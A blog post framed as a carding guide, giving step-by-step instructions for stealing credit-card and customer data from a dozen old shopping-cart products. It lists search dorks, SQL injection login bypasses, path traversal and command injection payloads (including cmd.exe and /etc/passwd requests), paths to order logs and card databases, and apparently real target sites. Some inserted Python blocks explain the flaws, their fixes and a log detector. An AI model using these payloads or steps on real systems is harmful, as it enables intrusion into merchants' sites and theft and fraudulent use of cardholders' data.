Monday, 11 November 2013

Carding? Let's Do It

Note  : - in this write-up we try 2 methods.
        - the first method goes in through the shopadmin.asp page using SQL injection.
        - the second method looks for the *.mdb database file via the shopdbtest.asp file
Method One :
------------
1. start by looking for a target site running VP-ASP Shopping Cart.
   search in all search engines --> google, altavista, yahoo, etc.
                 example : allinurl:vp-asp    or    allinurl:shopadmin.asp
2. say we get a site with the vp-asp cart ---> www.target.com.
   the manual pattern looks like :
           www.target.com/vp-asp dir/shopadmin.asp   or   www.target.com/shopadmin.asp
   note : it depends on where the site places the shopadmin.asp file
3. once we have the shopadmin.asp URL, we inject SQL into it.
   enter the injection login and password.
   example :
              www.target.com/vp-asp dir/shopadmin.asp
              login  : 'or''='        or        login   : admin
              passwd : 'or''='                  passwd  : 'or''='
4. OK. if we get in, we will see the contents of the admin database.
   such as :
             - Display Orders
             - Display Products
             - Edit Orders
             - and so on.
Method Two :
------------
1. when the injection fails, we try downloading the database instead :P~
2. the manual pattern uses shopdbtest.asp.
   example :
             www.target.com/vp-asp dir/shopdbtest.asp   or   www.target.com/shopdbtest.asp
   note : it depends on where the site places the shopdbtest.asp file
3. With luck we get information about the admin's database :)
   the database information contains :
     - xDatabase
     - xDblocation
     - xdatabasetype
     - xEmail
     - xEmailName
     - xEmailSubject
     - xEmailSystem
     - xEmailType
     - xOrdernumber
4. next we work out where the file with the *.mdb extension is.
   how :
     - xDatabase    ---> the name of the *.mdb file.
     - xDblocation  ---> the location of the *.mdb file.
    example :
     - xDatabase   = shopping200
     - xDblocation = shop
    display :
              www.target.com/shop/shoping200.mdb
5. after that the file shoping200.mdb is downloaded automatically :)
   to view the contents of the shoping200.mdb database you can open it with MS Access.
6. Ok, thanks, and good luck trying....
Example targets :
  NEXT   -----> Search Again !!!!
 
Note : this is Storefront sql injection tested on 6.0 and older versions.
Begin :
  - Search in your search engine a website that has storefront Shopping Cart.
  - coz this is sql injection from login page so search code like :
    e.g :  allinurl:StoreFront+login+page    or another combination :)
(1) found A Target like this:
    http://www.target.com/login.asp  or http://www.target.com/storedir/login.asp  
(2) to have then access to the first user in database structure.
    If an attacker knew any email address of a registered user, 
    it'll be possible for him to retrieve the registered user's information from this login page.
(3) and now example for injection to login.asp
    e.g :  http://www.target.com/login.asp
           login  : example@example.com  --> or u have a registered email id in that site.
           passwd : ' or 'a'='a
 
The ShopPlus shopping cart system allows you to build a store or a mall on the Internet.
Because of its flexibility, it allows you to sell virtually any product or services and
fully customize the shopping experience of your web site.
Owner :
http://www.ksofttech.com/help/shopplus/
Problem:
The script doesn't check symbols, so any user can execute commands on the web server.
Exploit:
http://target.com/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;uid|
http://target.com/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
Thank's
 
Bugs File   : admin page --> /admin
Display     : http://target.com/s-cart/admin
1. search in all search engine e.g --> allinurl:s-cart/index.phtml  or "s-cart" 
2. Get the target site like --> http://www.target.com/s-cart/index.phtml
3. and now go to admin page with change the Url to : 
   http://www.target.com/s-cart/admin   -->  auto open browser with login and passwd !!!
   login  : admin
   passwd : 'or''='
4. If U are lucky, u can see the admin manager, show the table Order now or Deface s-cart page.
   Ok let's to try :P~
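
Why the 'or''=' and ' or 'a'='a logins above get past shopadmin.asp, the StoreFront login.asp and the s-cart admin page, and what closes the hole. This is an added example, not code from this page or from any of these carts; it assumes a login check built by string concatenation, modelled with Python's sqlite3 and a constructed admins table.

```python
import hmac
import sqlite3

def make_db():
    # Constructed sample data: one admin account in an in-memory database.
    # The password is stored in clear only to keep the sample short; a real
    # system stores a salted hash.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (login TEXT, passwd TEXT)")
    db.execute("INSERT INTO admins VALUES ('admin', 's3cret-constructed')")
    return db

def login_concatenated(db, login, passwd):
    # Vulnerable pattern: user input is pasted into the SQL text, so a quote
    # in the input ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT login FROM admins WHERE login = '" + login +
           "' AND passwd = '" + passwd + "'")
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, login, passwd):
    # Hardened pattern: the placeholder keeps the input as data, never SQL,
    # and the password comparison happens outside the query.
    row = db.execute("SELECT passwd FROM admins WHERE login = ?",
                     (login,)).fetchone()
    return row is not None and hmac.compare_digest(row[0], passwd)

def compare(login, passwd):
    """Return (concatenated_result, parameterized_result) for one attempt."""
    db = make_db()
    return (login_concatenated(db, login, passwd),
            login_parameterized(db, login, passwd))

# The credential pairs quoted on the page, plus one legitimate login.
CASES = [
    ("'or''='", "'or''='"),
    ("admin", "'or''='"),
    ("example@example.com", "' or 'a'='a"),
    ("admin", "s3cret-constructed"),
]

if __name__ == "__main__":
    for login, passwd in CASES:
        print(repr(login), repr(passwd), compare(login, passwd))
```

With concatenation the WHERE clause ends in an always-true comparison, so every row matches; with the placeholder the same strings are just wrong credentials.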
 
how to :
1. you can just try typing "PDG_Cart" into a search engine.
   then you get a site that uses PDG_Cart.
   EXAMPLE:
   www.target.com/cgi-bin/PDG_Cart
2. then just type in the bug paths to get the MERCHANT login and password
   such as :
   -order.log
   -shopper.conf
   -Auth.log
   -Auth_Admin.log
   -authorizenet.log
   -etc.
example : www.target.com/cgi-bin/PDG_Cart/shopper.conf
 
MIDICART is an ASP and PHP based shopping cart application with MS Access and SQL database.
A security vulnerability in the product allows remote attackers to download the product's
database, and thus gain access to sensitive information about users of the product
(name, surname, address, e-mail, phone number, credit card number, and company name).
Example:
Accessing the following URL will return the database used by the product:
http://www.target.com/shoppingdirectory/midicart.mdb
e.g :
http://www.cc200.com/branches/pes/midicart/shop/midicart.mdb
So Download Now !!!
Thank's
 
how to :   search in every search engine
1. you can just try typing "mall2000.cgi" into a
   search engine, or look at http://www.ezmall2000.com/
   then you get a site that uses mall2000.cgi
   EXAMPLE:
   http://www.lexicom.ab.ca/cgi-bin/ezmall2000b/mall2000.cgi?
2. for the second step, just type " &page=../ "
   like this.
   example :
   http://www.lexicom.ab.ca/cgi-bin/ezmall2000b/mall2000.cgi?&page=../
3. then just type in the bug paths to get the data listing or the
   credit cards from the transactions on that site.
   such as :
   -order.log
   -error.log
   -access.log
   -etc.
   example :
   http://www.lexicom.ab.ca/cgi-bin/ezmall2000b/mall2000.cgi?&page=../order.log
4. once you have it, don't shout too loud or your friends will find out
   my advice: just keep trying often, OK.
5. read the tutorials for the other shopping carts too.
6. THANKS
 
Bugs File   : /forumcgi/display.cgi?
Display     : http://www.target.com/encore/forumcgi/display.cgi?
1. search in all search engine e.g --> allinurl:forumcgi/display.cgi?
2. Get the target site like --> http://www.target.com/encore/forumcgi/display.cgi?preftemp=temp
3. and now go to the exploit with insert this code : 
                        &page=anonymous&file=|uname%20-a|
4. Full Display like :
   http://www.target.com/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|uname%20-a|
5. Linux or Unix command available in here...  Good Luck :P~
 
Before looking for bugs in DCShop
you need to take a long, deep breath first, ok. Here's how :
1. Open a search engine (www.altavista.com or www.google.com)
2. Enter the keyword 'url:DCShop'
   and the search engine will look for all links
   that have DCShop in them.
3. Say you get the URL :
   http://theTargetHost/cgi-bin/DCShop/
4. to get the CC list and the shopping records from that site,
   you just append to the end :
   "Orders/orders.txt"
   in full it becomes :
   http://theTargetHost/cgi-bin/DCShop/Orders/orders.txt
5. next you can also look for the list of administrator names
   and their passwords by appending :
   "Auth_data/auth_user_file.txt"
   in full it becomes :
   http://theTargetHost/cgi-bin/DCShop/Auth_data/auth_user_file.txt
6. OK, that's it for now.... good luck trying.............
 
I am Just a KID.
I just want to know about this shopping Cart.
CommerceSQL shopping cart uses a PERL script for processing data or orders.
You can see more information about the CommerceSQL shopping cart at
http://commercesql.com.
I have known the full path from / the base directory or the path of files
starting the folder in which index.cgi resides.
 
 
 
Begin :
Search in your search engine a website that has CommerceSQL Shopping Cart.
(1) found A Target like this:
    http://www.target.com/cgi-bin/commerceSQL/index.cgi
    Anyway what useful files I've found so far are :  ?page=../index.cgi
    example:
    http://www.target.com/cgi-bin/commerceSQL/index.cgi?page=../index.cgi
(2) this is the file where you will find the paths to the shop admin 
    files: 
         ?page=../admin/manager.cgi 
         example :
         http://www.target.com/cgi-bin/commerceSQL/index.cgi?page=../admin/manager.cgi
(3) this is the file where you will find the paths to the admin configuration file,
    and this is where you'll find the database file name, username and 
    password to access it :
    ?page=../admin/admin_conf.pl 
     or
    ?page=../admin/configuration.pl
    ?page=../admin/admin_conf.pl
    ?page=../admin/html_lib.pl
    example :
    http://www.target.com/cgi-bin/commerceSQL/index.cgi?page=../admin/admin_conf.pl
(4) this is the file where you will find the paths to the Order log :
    ?page=../admin/files/order.log
    example :
    http://www.target.com/cgi-bin/commerceSQL/index.cgi?page=../admin/files/order.log
(5) Good Luck !!! and sorry my english is bad :P
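
The ?page=../ requests against mall2000.cgi and the CommerceSQL index.cgi work when a script joins the parameter onto its page directory without checking where the result lands. An added example, not the carts' own code, of that join beside a resolver that confines page to the directory; the function names and the html/admin layout are assumptions.

```python
import os
import tempfile

def resolve_unsafe(base_dir, page):
    # Pattern behind the ?page=../ requests: the parameter is joined to the
    # page directory and used as-is, so "../" walks out of it.
    return os.path.normpath(os.path.join(base_dir, page))

def resolve_safe(base_dir, page):
    """Return the real path of `page` inside base_dir, or None if it escapes."""
    base = os.path.realpath(base_dir)
    # realpath collapses ".." and follows symlinks before the containment
    # test; an absolute `page` replaces base entirely and fails the test too.
    candidate = os.path.realpath(os.path.join(base, page))
    if os.path.commonpath([base, candidate]) != base:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate

def demo():
    # Constructed layout: <root>/html holds pages, <root>/admin holds config.
    root = os.path.realpath(tempfile.mkdtemp())
    html = os.path.join(root, "html")
    admin = os.path.join(root, "admin")
    os.makedirs(html)
    os.makedirs(admin)
    for path in (os.path.join(html, "products.html"),
                 os.path.join(admin, "admin_conf.pl")):
        with open(path, "w") as fh:
            fh.write("constructed sample\n")
    results = {}
    for page in ("products.html", "../admin/admin_conf.pl", "/etc/passwd"):
        unsafe = resolve_unsafe(html, page)
        escapes = not unsafe.startswith(html + os.sep)
        results[page] = (escapes, resolve_safe(html, page) is not None)
    return results  # page -> (unsafe join left the directory, safe resolver served it)

if __name__ == "__main__":
    for page, outcome in demo().items():
        print(page, outcome)
```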
 
Recently there have been many hacking attempts attacking e-commerce sites
that use CCBILL to process credit cards. Some of my clients' sites were
hacked and defaced through this vulnerability. In the Incidents List,
some people have already mentioned it. I just took a look at the
actual problem and figured out that the vulnerability is in whereami.cgi
in the /ccbill/ directory. That script allows attackers to run commands
without authorization.
Example :
http://victimhost/ccbill/whereami.cgi?g=cat%20../../../../etc/password
Thank's
 
NB :  Can only be used against some sites that have the same
                weakness.
Step 1: First find a Cart32 v3.5a website
Step 2: Search in all the search engines you know
                 with the keyword " Cart32 v3.5a  "
Step 3: Go to the website's Cart32.exe
                 http://target/login/unicode/cart32.exe
                 (example : http://www.connectionsmall.com/scripts/cart32.exe/)
Step 4: After you get there, you will be shown a display
      like the one below :
Cart32 v3.5a
Step 4: Now what you have to do is put the following extension
    at the end of the URL, 98% use #1 & #2
     a. (..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\)
     b. (..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\)
     c. (..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\)
 ONLY USED SOMETIMES!
(example:http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\)
Step 5: Once you are in the root directory (c:\), to get to the
    cc's, add (\progra~1\MWAInc\Cart32\) to the end of that URL
    so that you now see something like :
 http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\
    Now you can see many files such as :
          2814659000-001001.c32
          2814659000-001002.c32
          2814659000-001003.c32
Step 6:   Copy one of those file names and then
    put it at the end of the URL, and it will look like :
 http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+type+c:\progra~1\mwainc\cart32\2814659000-001003.c32
    Note : There you will see other files containing a great many
    cc's such as :
                   RONACK-orders.txt (this file is not on this particular site)
                   procure-orders.txt (this file is not on this particular site)
Step 7: Before you access the other file types, you must first change
      *c+dir+c:\* to *c+type+c:\*
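
A log check for the request shapes used above against shopplus.cgi, display.cgi and the Cart32 /scripts/ URLs, added here as an example and not part of the original page: it flags overlong UTF-8 encodings of "/" and "\", "../" after decoding, and shell metacharacters in the query string. The log lines are constructed and use documentation IP addresses.

```python
import re
from urllib.parse import unquote

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+)')
# %c0/%c1 lead bytes and %e0 followed by %80-%9f are overlong UTF-8 forms
# (e.g. %c0%af for "/"). Strict decoders reject them, so match the raw text.
OVERLONG = re.compile(
    r"%c[01]%[89ab][0-9a-f]|%e0%[89][0-9a-f]%[89ab][0-9a-f]", re.I)
TRAVERSAL = re.compile(r"\.\.[/\\]")
SHELL_META = re.compile(r"[|;`]")  # can also hit legitimate ';' separators

def classify(target):
    """Return the set of findings for one request target (path?query)."""
    findings = set()
    if OVERLONG.search(target):
        findings.add("overlong-utf8")
    path, _, query = target.partition("?")
    if TRAVERSAL.search(unquote(path)) or TRAVERSAL.search(unquote(query)):
        findings.add("traversal")
    if SHELL_META.search(unquote(query)):
        findings.add("shell-metachar")
    return findings

def scan(lines):
    """Return (target, sorted findings) for every log line with a finding."""
    report = []
    for line in lines:
        match = REQUEST.search(line)
        if match:
            found = classify(match.group(1))
            if found:
                report.append((match.group(1), sorted(found)))
    return report

# Constructed access-log lines; paths follow the shapes quoted on the page.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Nov/2013:10:00:01 +0000] "GET /cgi-bin/commerceSQL/index.cgi?page=products HTTP/1.0" 200 5120',
    '192.0.2.77 - - [11/Nov/2013:10:00:05 +0000] "GET /cgi-bin/commerceSQL/index.cgi?page=../admin/admin_conf.pl HTTP/1.0" 200 2211',
    '192.0.2.77 - - [11/Nov/2013:10:00:09 +0000] "GET /encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|uname%20-a| HTTP/1.0" 200 87',
    r'192.0.2.77 - - [11/Nov/2013:10:00:12 +0000] "GET /scripts/..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 200 900',
]

if __name__ == "__main__":
    for target, found in scan(SAMPLE_LOG):
        print(found, target)
```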
 
TUTORIAL II  : Cart32 v3.5a
Target: http://www.partybows.com
1. Go to http://www.partybows.com
2. Click http://www.partybows.com/seasonal.htm
3. Fill in Quantity= 1   Basically act as if you are buying and click order
4. You will then end up here :
    https://secure.axionet.com/partybows/cgi-bin/cart32.exe/partybows-AddItem
5. Change it to
    https://secure.axionet.com/partybows/cgi-bin/cart32.exe/error
      Cart32 v3.5 Error      
              CART32 Build 619
      The following internal error has occurred: Invalid procedure 
                Error Number = 5      
                Click Here For Possible Solutions      
               etc.
6. Look for its order log
         Cart32 Setup Info and Directory
 Mail Server = mail.axion.net Section=Main
 AdminDir = D:\secure\webroot\partybows\cgi-bin\cart32\
 So it is partybows-orders.txt.
               So in the end :
               http://www.partybows.com/cgi-bin/cart32/partybows-orders.txt
7. Or, to get the admin password, you just type cart32.ini
              https://secure.axionet.com/partybows/cgi-bin/cart32.ini
              you will unintentionally download the admin password
              that is in the cart32.ini file.
              you will get the encrypted admin password
              then you try to decrypt it with the software
              " Cart32decoder.exe "
8. To get the clients' names and passwords in Cart32
              you can try typing "CLIENT.DBF"
              or :
              the order file at "ORDER or ORDERS.DBF"
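
The VP-ASP, PDG_Cart, MIDICART, DCShop and Cart32 sections all come down to order logs, databases and config files sitting where the web server will hand them out. An added example (not from the page) of an audit a site owner can run over a document root to find such files; the pattern list and the sample tree are assumptions built from the file names quoted above.

```python
import fnmatch
import os
import tempfile

# Data-file patterns drawn from the names on the page (assumed list; extend
# it for the carts actually installed).
SENSITIVE_PATTERNS = [
    "*.mdb", "*.dbf", "*.log", "*.ini", "*.conf",
    "*orders.txt", "auth_user_file.txt",
]

def find_exposed(docroot):
    """Return URL paths under docroot whose file names match a data pattern."""
    hits = []
    for dirpath, _dirs, files in os.walk(docroot):
        for name in files:
            lowered = name.lower()  # names such as CLIENT.DBF vary in case
            if any(fnmatch.fnmatchcase(lowered, pat)
                   for pat in SENSITIVE_PATTERNS):
                rel = os.path.relpath(os.path.join(dirpath, name), docroot)
                hits.append("/" + rel.replace(os.sep, "/"))
    return sorted(hits)

def build_sample_docroot():
    # Constructed tree mirroring the layouts described on the page.
    root = tempfile.mkdtemp()
    for rel in ("index.html",
                "images/logo.gif",
                "shop/shopping200.mdb",
                "cgi-bin/DCShop/Orders/orders.txt",
                "cgi-bin/DCShop/Auth_data/auth_user_file.txt",
                "cgi-bin/PDG_Cart/shopper.conf",
                "cgi-bin/cart32/CLIENT.DBF"):
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("constructed sample\n")
    return root

if __name__ == "__main__":
    for url_path in find_exposed(build_sample_docroot()):
        print("served from docroot:", url_path)
```

Anything it reports belongs outside the document root, or behind a server rule that denies those names.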
 
TUTORIAL III : Cart32 v3.5a
search +/scripts/cart32.exe/ 
Exploitable Directories
-/scripts/cart32.ini
-/scripts/cart32.exe 
-/scripts/cart32.exe/cart32clientlist
-/script/c32web.exe/ChangeAdminPassword  
-/scripts/c32web.exe
-cgi-shl/c32web.exe/ 
Wherever there is the cart32.exe, add /cart32clientlist to the end of it
and erase the rest. A menu will come up with a submit box; click go.
It will list ALL clients and their passwords. Passwords will be encrypted.
After decrypting the password, go to wherever the [c32web.exe] file is.
That's the instructions with exploits what that channel we were just in called


1 comments:

Unknown said...

This makes my head spin, bro :v
